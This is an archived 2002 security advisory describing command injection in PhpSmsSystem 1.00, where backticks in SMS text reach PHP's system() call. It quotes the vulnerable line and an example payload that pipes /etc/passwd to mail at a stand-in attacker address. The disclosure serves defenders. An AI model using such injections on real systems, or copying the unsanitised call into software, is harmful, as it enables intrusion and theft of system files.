TUCoPS :: Web :: PHP :: web5046.htm

SmsSend - Php interface to SmsSend may be fooled to remotely run arbitrary code
30th Jan 2002 [SBWID-5046]
COMMAND

	Php interface to SmsSend may be fooled to remotely run arbitrary code

SYSTEMS AFFECTED

	PhpSmsSystem Version 1.00

PROBLEM

	Indra Kusuma posted :
	

	from file .php :
	

	      $str = SMSSEND.\" \".SCRIPTSPATH.$script.\" $params -- -d 0 \".PROXY;

	      system($str,$res);

	

	if the sms messages contain a backtick \"`\"  then  inside  of  backtick
	will be execute as a system command.
	

	the result of the command will send via sms :), so  the  command  output
	should be less than 160 characters to send via sms, but if  the  command
	using pipe (ex : cat /etc/passwd|mail  evil@hacker.com)  or  redirection
	then the messages status is successfully :)

SOLUTION

	Upgrade ??
	

	http://zekiller.skytech.org/smssend.php

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH